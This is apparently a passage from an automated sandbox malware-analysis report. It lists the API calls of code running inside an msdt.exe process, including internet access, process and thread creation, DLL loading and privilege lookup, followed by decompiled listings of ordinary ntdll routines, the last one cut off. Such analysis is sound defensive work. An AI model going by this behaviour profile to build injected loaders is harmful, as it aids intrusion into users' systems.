• API String ID: 3050416762-1024195942

Control-flow Graph (rendered graph omitted): blocks 118bf0-118c31 (call 119280), 118c33-118c4d (InternetOpenA), 118c4e-118c54
APIs
• InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00118C47
Memory Dump Source
• Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_100000_msdt.jbxd
Similarity
• API ID: InternetOpen
• String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
• API String ID: 2038078732-3155091674

Control-flow Graph (rendered graph omitted): blocks spanning 1172f0-117412; Sleep is called in block 117390-1173a1
APIs
• Sleep.KERNELBASE(000007D0), ref: 00117398
Memory Dump Source
• Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_100000_msdt.jbxd
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229

Control-flow Graph (rendered graph omitted): block 1188e0-118911 (call 1191d0, RtlFreeHeap)
APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00103B93), ref: 0011890D
Memory Dump Source
• Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_100000_msdt.jbxd
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116

Control-flow Graph
APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001072DA
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001072FB
Memory Dump Source
• Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_100000_msdt.jbxd
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0

Control-flow Graph (rendered graph omitted): blocks spanning 109b30-109baa; LdrLoadDll is called in block 109b90-109ba4
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00109BA2
Memory Dump Source
• Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_100000_msdt.jbxd
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0

Control-flow Graph (rendered graph omitted): block 118950-1189a8 (call 1191d0, CreateProcessInternalW)
APIs
• CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001189A4
Memory Dump Source
• Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_100000_msdt.jbxd
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0

Control-flow Graph (rendered graph omitted): blocks 117420-117448 (call 113e40), 11744a-117466 (call 11d5a2, CreateThread), 117467-11746c
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0010CCE0,?,?), ref: 0011745C
Memory Dump Source
• Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_100000_msdt.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0

APIs
• RtlDosPathNameToNtPathName_U.NTDLL(00700069,00000000,00000000,00104965,00000000,00000000,00700069,?,00103B93), ref: 00117EF1
Memory Dump Source
• Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_100000_msdt.jbxd
Similarity
• API ID: Path$NameName_
• String ID:
• API String ID: 3514427675-0

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,0010CFB2,0010CFB2,?,00000000,?,?), ref: 00118A70
Memory Dump Source
• Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_100000_msdt.jbxd
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0

APIs
• RtlAllocateHeap.NTDLL(00113526,?,00113C9F,00113C9F,?,00113526,?,?,?,?,?,00000000,00000000,?), ref: 001188CD
Memory Dump Source
• Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_100000_msdt.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0

APIs
• SetErrorMode.KERNELBASE(00008003,?,?,00107C83,?), ref: 0010D44B
Memory Dump Source
• Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_100000_msdt.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0

Non-executed Functions

C-Code - Quality: 94%
                                                                    			E025B8788(signed int __ecx, void* __edx, signed int _a4) {
                                                                    				signed int _v8;
                                                                    				short* _v12;
                                                                    				void* _v16;
                                                                    				signed int _v20;
                                                                    				char _v24;
                                                                    				signed int _v28;
                                                                    				signed int _v32;
                                                                    				char _v36;
                                                                    				signed int _v40;
                                                                    				char _v44;
                                                                    				signed int _v48;
                                                                    				signed int _v52;
                                                                    				signed int _v56;
                                                                    				signed int _v60;
                                                                    				char _v68;
                                                                    				void* _t216;
                                                                    				intOrPtr _t231;
                                                                    				short* _t235;
                                                                    				intOrPtr _t257;
                                                                    				short* _t261;
                                                                    				intOrPtr _t284;
                                                                    				intOrPtr _t288;
                                                                    				void* _t314;
                                                                    				signed int _t318;
                                                                    				short* _t319;
                                                                    				intOrPtr _t321;
                                                                    				void* _t328;
                                                                    				void* _t329;
                                                                    				char* _t332;
                                                                    				signed int _t333;
                                                                    				signed int* _t334;
                                                                    				void* _t335;
                                                                    				void* _t338;
                                                                    				void* _t339;
                                                                    
                                                                    				_t328 = __edx;
                                                                    				_t322 = __ecx;
                                                                    				_t318 = 0;
                                                                    				_t334 = _a4;
                                                                    				_v8 = 0;
                                                                    				_v28 = 0;
                                                                    				_v48 = 0;
                                                                    				_v20 = 0;
                                                                    				_v40 = 0;
                                                                    				_v32 = 0;
                                                                    				_v52 = 0;
                                                                    				if(_t334 == 0) {
                                                                    					_t329 = 0xc000000d;
                                                                    					L49:
                                                                    					_t334[0x11] = _v56;
                                                                    					 *_t334 =  *_t334 | 0x00000800;
                                                                    					_t334[0x12] = _v60;
                                                                    					_t334[0x13] = _v28;
                                                                    					_t334[0x17] = _v20;
                                                                    					_t334[0x16] = _v48;
                                                                    					_t334[0x18] = _v40;
                                                                    					_t334[0x14] = _v32;
                                                                    					_t334[0x15] = _v52;
                                                                    					return _t329;
                                                                    				}
                                                                    				_v56 = 0;
                                                                    				if(E025B8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                    					_v56 = 1;
                                                                    					if(_v8 != 0) {
                                                                    						_t207 = E0259E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                    					}
                                                                    					_push(1);
                                                                    					_v8 = _t318;
                                                                    					E025B718A(_t207);
                                                                    					_t335 = _t335 + 4;
                                                                    				}
                                                                    				_v60 = _v60 | 0xffffffff;
                                                                    				if(E025B8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                    					_t333 =  *_v8;
                                                                    					_v60 = _t333;
                                                                    					_t314 = E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                    					_push(_t333);
                                                                    					_v8 = _t318;
                                                                    					E025B718A(_t314);
                                                                    					_t335 = _t335 + 4;
                                                                    				}
                                                                    				_t216 = E025B8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                    				_t332 = ";";
                                                                    				if(_t216 < 0) {
                                                                    					L17:
                                                                    					if(E025B8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                    						L30:
                                                                    						if(E025B8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                    							L46:
                                                                    							_t329 = 0;
                                                                    							L47:
                                                                    							if(_v8 != _t318) {
                                                                    								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                    							}
                                                                    							if(_v28 != _t318) {
                                                                    								if(_v20 != _t318) {
                                                                    									E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                    									_v20 = _t318;
                                                                    									_v40 = _t318;
                                                                    								}
                                                                    							}
                                                                    							goto L49;
                                                                    						}
                                                                    						_t231 = _v24;
                                                                    						_t322 = _t231 + 4;
                                                                    						_push(_t231);
                                                                    						_v52 = _t322;
                                                                    						E025B718A(_t231);
                                                                    						if(_t322 == _t318) {
                                                                    							_v32 = _t318;
                                                                    						} else {
                                                                    							_v32 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                    						}
                                                                    						if(_v32 == _t318) {
                                                                    							_v52 = _t318;
                                                                    							L58:
                                                                    							_t329 = 0xc0000017;
                                                                    							goto L47;
                                                                    						} else {
                                                                    							E02592340(_v32, _v8, _v24);
                                                                    							_v16 = _v32;
                                                                    							_a4 = _t318;
                                                                    							_t235 = E025AE679(_v32, _t332);
                                                                    							while(1) {
                                                                    								_t319 = _t235;
                                                                    								if(_t319 == 0) {
                                                                    									break;
                                                                    								}
                                                                    								 *_t319 = 0;
                                                                    								_t321 = _t319 + 2;
                                                                    								E0259E2A8(_t322,  &_v68, _v16);
                                                                    								if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                                                    									_a4 = _a4 + 1;
                                                                    								}
                                                                    								_v16 = _t321;
                                                                    								_t235 = E025AE679(_t321, _t332);
                                                                    								_pop(_t322);
                                                                    							}
                                                                    							_t236 = _v16;
                                                                    							if( *_v16 != _t319) {
                                                                    								E0259E2A8(_t322,  &_v68, _t236);
                                                                    								if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                                                    									_a4 = _a4 + 1;
                                                                    								}
                                                                    							}
                                                                    							if(_a4 == 0) {
                                                                    								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                    								_v52 = _v52 & 0x00000000;
                                                                    								_v32 = _v32 & 0x00000000;
                                                                    							}
                                                                    							if(_v8 != 0) {
                                                                    								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                    							}
                                                                    							_v8 = _v8 & 0x00000000;
                                                                    							_t318 = 0;
                                                                    							goto L46;
                                                                    						}
                                                                    					}
                                                                    					_t257 = _v24;
                                                                    					_t322 = _t257 + 4;
                                                                    					_push(_t257);
                                                                    					_v40 = _t322;
                                                                    					E025B718A(_t257);
                                                                    					_t338 = _t335 + 4;
                                                                    					if(_t322 == _t318) {
                                                                    						_v20 = _t318;
                                                                    					} else {
                                                                    						_v20 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                    					}
                                                                    					if(_v20 == _t318) {
                                                                    						_v40 = _t318;
                                                                    						goto L58;
                                                                    					} else {
                                                                    						E02592340(_v20, _v8, _v24);
                                                                    						_v16 = _v20;
                                                                    						_a4 = _t318;
                                                                    						_t261 = E025AE679(_v20, _t332);
                                                                    						_t335 = _t338 + 0x14;
                                                                    						while(1) {
                                                                    							_v12 = _t261;
                                                                    							if(_t261 == _t318) {
                                                                    								break;
                                                                    							}
                                                                    							_v12 = _v12 + 2;
                                                                    							 *_v12 = 0;
                                                                    							E0259E2A8(_v12,  &_v68, _v16);
                                                                    							if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                                                    								_a4 = _a4 + 1;
                                                                    							}
                                                                    							_v16 = _v12;
                                                                    							_t261 = E025AE679(_v12, _t332);
                                                                    							_pop(_t322);
                                                                    						}
                                                                    						_t269 = _v16;
                                                                    						if( *_v16 != _t318) {
                                                                    							E0259E2A8(_t322,  &_v68, _t269);
                                                                    							if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                                                    								_a4 = _a4 + 1;
                                                                    							}
                                                                    						}
                                                                    						if(_a4 == _t318) {
                                                                    							E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                    							_v40 = _t318;
                                                                    							_v20 = _t318;
                                                                    						}
                                                                    						if(_v8 != _t318) {
                                                                    							E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                    						}
                                                                    						_v8 = _t318;
                                                                    						goto L30;
                                                                    					}
                                                                    				}
                                                                    				_t284 = _v24;
                                                                    				_t322 = _t284 + 4;
                                                                    				_push(_t284);
                                                                    				_v48 = _t322;
                                                                    				E025B718A(_t284);
                                                                    				_t339 = _t335 + 4;
                                                                    				if(_t322 == _t318) {
                                                                    					_v28 = _t318;
                                                                    				} else {
                                                                    					_v28 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                    				}
                                                                    				if(_v28 == _t318) {
                                                                    					_v48 = _t318;
                                                                    					goto L58;
                                                                    				} else {
                                                                    					E02592340(_v28, _v8, _v24);
                                                                    					_v16 = _v28;
                                                                    					_a4 = _t318;
                                                                    					_t288 = E025AE679(_v28, _t332);
                                                                    					_t335 = _t339 + 0x14;
                                                                    					while(1) {
                                                                    						_v12 = _t288;
                                                                    						if(_t288 == _t318) {
                                                                    							break;
                                                                    						}
                                                                    						_v12 = _v12 + 2;
                                                                    						 *_v12 = 0;
                                                                    						E0259E2A8(_v12,  &_v68, _v16);
                                                                    						if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                                                    							_a4 = _a4 + 1;
                                                                    						}
                                                                    						_v16 = _v12;
                                                                    						_t288 = E025AE679(_v12, _t332);
                                                                    						_pop(_t322);
                                                                    					}
                                                                    					_t296 = _v16;
                                                                    					if( *_v16 != _t318) {
                                                                    						E0259E2A8(_t322,  &_v68, _t296);
                                                                    						if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                                                    							_a4 = _a4 + 1;
                                                                    						}
                                                                    					}
                                                                    					if(_a4 == _t318) {
                                                                    						E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                    						_v48 = _t318;
                                                                    						_v28 = _t318;
                                                                    					}
                                                                    					if(_v8 != _t318) {
                                                                    						E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                    					}
                                                                    					_v8 = _t318;
                                                                    					goto L17;
                                                                    				}
                                                                    			}
                                                                    0x025b886c
                                                                    0x025b8872
                                                                    0x02601b0e
                                                                    0x00000000
                                                                    0x025b8878
                                                                    0x025b8881
                                                                    0x025b888b
                                                                    0x025b888e
                                                                    0x025b8891
                                                                    0x025b8896
                                                                    0x025b8899
                                                                    0x025b8899
                                                                    0x025b889e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02601b21
                                                                    0x02601b27
                                                                    0x02601b2e
                                                                    0x02601b42
                                                                    0x02601b44
                                                                    0x02601b44
                                                                    0x02601b4c
                                                                    0x02601b4f
                                                                    0x02601b55
                                                                    0x02601b55
                                                                    0x025b88a4
                                                                    0x025b88aa
                                                                    0x025b88b1
                                                                    0x025b88c5
                                                                    0x02601b5b
                                                                    0x02601b5b
                                                                    0x025b88c5
                                                                    0x025b88ce
                                                                    0x025b88e0
                                                                    0x025b88e5
                                                                    0x025b88e8
                                                                    0x025b88e8
                                                                    0x025b88ee
                                                                    0x025b8900
                                                                    0x025b8900
                                                                    0x025b8905
                                                                    0x00000000
                                                                    0x025b8905

                                                                    APIs
                                                                    Strings
                                                                    • Kernel-MUI-Language-Allowed, xrefs: 025B8827
                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 025B8914
                                                                    • Kernel-MUI-Number-Allowed, xrefs: 025B87E6
                                                                    • Kernel-MUI-Language-SKU, xrefs: 025B89FC
                                                                    • WindowsExcludedProcs, xrefs: 025B87C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: _wcspbrk
                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                    • API String ID: 402402107-258546922
                                                                    • Opcode ID: c18dc0fc56fb19ac12e599fb4641d75fc57925eda29392d40a7628e04c8b00a6
                                                                    • Instruction ID: 48a7cfda28b5eb284bd86bec5e6f5d5a0913c5f28c6ee7c76abfc13b14a5ff61
                                                                    • Opcode Fuzzy Hash: c18dc0fc56fb19ac12e599fb4641d75fc57925eda29392d40a7628e04c8b00a6
                                                                    • Instruction Fuzzy Hash: 77F1F9B2D00209EFCF11DF98C985AEEBBB9FF48304F14546AE505A7250E7349A45DF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 38%
                                                                    			E025D13CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                    				char _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr* _v16;
                                                                    				intOrPtr _v20;
                                                                    				char _v24;
                                                                    				intOrPtr _t71;
                                                                    				signed int _t78;
                                                                    				signed int _t86;
                                                                    				char _t90;
                                                                    				signed int _t91;
                                                                    				signed int _t96;
                                                                    				intOrPtr _t108;
                                                                    				signed int _t114;
                                                                    				void* _t115;
                                                                    				intOrPtr _t128;
                                                                    				intOrPtr* _t129;
                                                                    				void* _t130;
                                                                    
                                                                    				_t129 = _a4;
                                                                    				_t128 = _a8;
                                                                    				_t116 = 0;
                                                                    				_t71 = _t128 + 0x5c;
                                                                    				_v8 = 8;
                                                                    				_v20 = _t71;
                                                                    				if( *_t129 == 0) {
                                                                    					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                    						goto L5;
                                                                    					} else {
                                                                    						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                    						if(_t96 != 0) {
                                                                    							L38:
                                                                    							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                    								goto L5;
                                                                    							} else {
                                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                    								_t86 = E025C7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                    								L36:
                                                                    								return _t128 + _t86 * 2;
                                                                    							}
                                                                    						}
                                                                    						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                    						if(_t114 == 0) {
                                                                    							L33:
                                                                    							_t115 = 0x2592926;
                                                                    							L35:
                                                                    							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                    							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                    							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                    							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                    							_t86 = E025C7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                    							goto L36;
                                                                    						}
                                                                    						if(_t114 != 0xffff) {
                                                                    							_t116 = 0;
                                                                    							goto L38;
                                                                    						}
                                                                    						if(_t114 != 0) {
                                                                    							_t115 = 0x2599cac;
                                                                    							goto L35;
                                                                    						}
                                                                    						goto L33;
                                                                    					}
                                                                    				} else {
                                                                    					L5:
                                                                    					_a8 = _t116;
                                                                    					_a4 = _t116;
                                                                    					_v12 = _t116;
                                                                    					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                    						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                    							_v8 = 6;
                                                                    						}
                                                                    					}
                                                                    					_t90 = _v8;
                                                                    					if(_t90 <= _t116) {
                                                                    						L11:
                                                                    						if(_a8 - _a4 <= 1) {
                                                                    							_a8 = _t116;
                                                                    							_a4 = _t116;
                                                                    						}
                                                                    						_t91 = 0;
                                                                    						if(_v8 <= _t116) {
                                                                    							L22:
                                                                    							if(_v8 < 8) {
                                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                    								_t128 = _t128 + E025C7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                    							}
                                                                    							return _t128;
                                                                    						} else {
                                                                    							L14:
                                                                    							if(_a4 > _t91 || _t91 >= _a8) {
                                                                    								if(_t91 != _t116 && _t91 != _a8) {
                                                                    									_push(":");
                                                                    									_push(_t71 - _t128 >> 1);
                                                                    									_push(_t128);
                                                                    									_t128 = _t128 + E025C7707() * 2;
                                                                    									_t71 = _v20;
                                                                    									_t130 = _t130 + 0xc;
                                                                    								}
                                                                    								_t78 = E025C7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                    								_t130 = _t130 + 0x10;
                                                                    							} else {
                                                                    								_push(L"::");
                                                                    								_push(_t71 - _t128 >> 1);
                                                                    								_push(_t128);
                                                                    								_t78 = E025C7707();
                                                                    								_t130 = _t130 + 0xc;
                                                                    								_t91 = _a8 - 1;
                                                                    							}
                                                                    							_t91 = _t91 + 1;
                                                                    							_t128 = _t128 + _t78 * 2;
                                                                    							_t71 = _v20;
                                                                    							if(_t91 >= _v8) {
                                                                    								goto L22;
                                                                    							}
                                                                    							_t116 = 0;
                                                                    							goto L14;
                                                                    						}
                                                                    					} else {
                                                                    						_t108 = 1;
                                                                    						_v16 = _t129;
                                                                    						_v24 = _t90;
                                                                    						do {
                                                                    							if( *_v16 == _t116) {
                                                                    								if(_t108 - _v12 > _a8 - _a4) {
                                                                    									_a4 = _v12;
                                                                    									_a8 = _t108;
                                                                    								}
                                                                    								_t116 = 0;
                                                                    							} else {
                                                                    								_v12 = _t108;
                                                                    							}
                                                                    							_v16 = _v16 + 2;
                                                                    							_t108 = _t108 + 1;
                                                                    							_t26 =  &_v24;
                                                                    							 *_t26 = _v24 - 1;
                                                                    						} while ( *_t26 != 0);
                                                                    						goto L11;
                                                                    					}
                                                                    				}
                                                                    			}
                                                                    0x025d13d5
                                                                    0x025d13d9
                                                                    0x025d13dc
                                                                    0x025d13de
                                                                    0x025d13e1
                                                                    0x025d13e8
                                                                    0x025d13ee
                                                                    0x025fe8fd
                                                                    0x00000000
                                                                    0x025fe921
                                                                    0x025fe921
                                                                    0x025fe928
                                                                    0x025fe982
                                                                    0x025fe98a
                                                                    0x00000000
                                                                    0x025fe99a
                                                                    0x025fe99e
                                                                    0x025fe9a3
                                                                    0x025fe9a8
                                                                    0x025fe9b9
                                                                    0x025fe978
                                                                    0x00000000
                                                                    0x025fe978
                                                                    0x025fe98a
                                                                    0x025fe92a
                                                                    0x025fe931
                                                                    0x025fe944
                                                                    0x025fe944
                                                                    0x025fe950
                                                                    0x025fe954
                                                                    0x025fe959
                                                                    0x025fe95e
                                                                    0x025fe963
                                                                    0x025fe970
                                                                    0x00000000
                                                                    0x025fe975
                                                                    0x025fe93b
                                                                    0x025fe980
                                                                    0x00000000
                                                                    0x025fe980
                                                                    0x025fe942
                                                                    0x025fe94b
                                                                    0x00000000
                                                                    0x025fe94b
                                                                    0x00000000
                                                                    0x025fe942
                                                                    0x025d13f4
                                                                    0x025d13f4
                                                                    0x025d13f9
                                                                    0x025d13fc
                                                                    0x025d13ff
                                                                    0x025d1406
                                                                    0x025fe9cc
                                                                    0x025fe9d2
                                                                    0x025fe9d2
                                                                    0x025fe9cc
                                                                    0x025d140c
                                                                    0x025d1411
                                                                    0x025d1431
                                                                    0x025d143a
                                                                    0x025d143c
                                                                    0x025d143f
                                                                    0x025d143f
                                                                    0x025d1442
                                                                    0x025d1447
                                                                    0x025d14a8
                                                                    0x025d14ac
                                                                    0x025fe9e2
                                                                    0x025fe9e7
                                                                    0x025fe9ec
                                                                    0x025fea05
                                                                    0x025fea05
                                                                    0x00000000
                                                                    0x025d1449
                                                                    0x00000000
                                                                    0x025d1449
                                                                    0x025d144c
                                                                    0x025d1459
                                                                    0x025d1462
                                                                    0x025d1469
                                                                    0x025d146a
                                                                    0x025d1470
                                                                    0x025d1473
                                                                    0x025d1476
                                                                    0x025d1476
                                                                    0x025d1490
                                                                    0x025d1495
                                                                    0x025d138e
                                                                    0x025d1390
                                                                    0x025d1397
                                                                    0x025d1398
                                                                    0x025d1399
                                                                    (instruction address column of the preceding listing, detached by extraction: 0x025d13a1 to 0x025d14a4)

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: af00593a3585537e40e099d5214638b9204e0096a9a688a8724429d6cd2f1b12
                                                                    • Instruction ID: 6d5766b2b32a0f4400b6704f703a9caa6e3736b187264bb8becfd9a5303c7972
                                                                    • Opcode Fuzzy Hash: af00593a3585537e40e099d5214638b9204e0096a9a688a8724429d6cd2f1b12
                                                                    • Instruction Fuzzy Hash: 946105B1900A56AADF34DFADC9809BEBFB6FF84300754C52DE59A47540D334A640CB68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 64%
                                                                    			// Decompiled from the ntdll image mapped at 0x02570000 in process 4: the
                                                                    			// "CLIENT(ntdll)" debug strings and the BaseQueryModuleData import identify it.
                                                                    			// The routine reads the image's ExecuteOptions entry from the application
                                                                    			// compatibility database and returns 1 when "Execute=1" is present, i.e. when
                                                                    			// execution protection (DEP) is to be turned off for the process; otherwise it
                                                                    			// walks the space-separated section entries and returns 0. Helper names in the
                                                                    			// comments are inferred from how each call is used, not from symbols.
                                                                    			E025C7EFD(void* __ecx, intOrPtr _a4) {
                                                                    				signed int _v8;
                                                                    				char _v540;
                                                                    				unsigned int _v544;
                                                                    				signed int _v548;
                                                                    				intOrPtr _v552;
                                                                    				char _v556;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t33;
                                                                    				void* _t38;
                                                                    				unsigned int _t46;
                                                                    				unsigned int _t47;
                                                                    				unsigned int _t52;
                                                                    				intOrPtr _t56;
                                                                    				unsigned int _t62;
                                                                    				void* _t69;
                                                                    				void* _t70;
                                                                    				intOrPtr _t72;
                                                                    				signed int _t73;
                                                                    				void* _t74;
                                                                    				void* _t75;
                                                                    				void* _t76;
                                                                    				void* _t77;
                                                                    
                                                                    				_t33 =  *0x2672088; // 0x762a3ac1   stack-cookie (__security_cookie) load
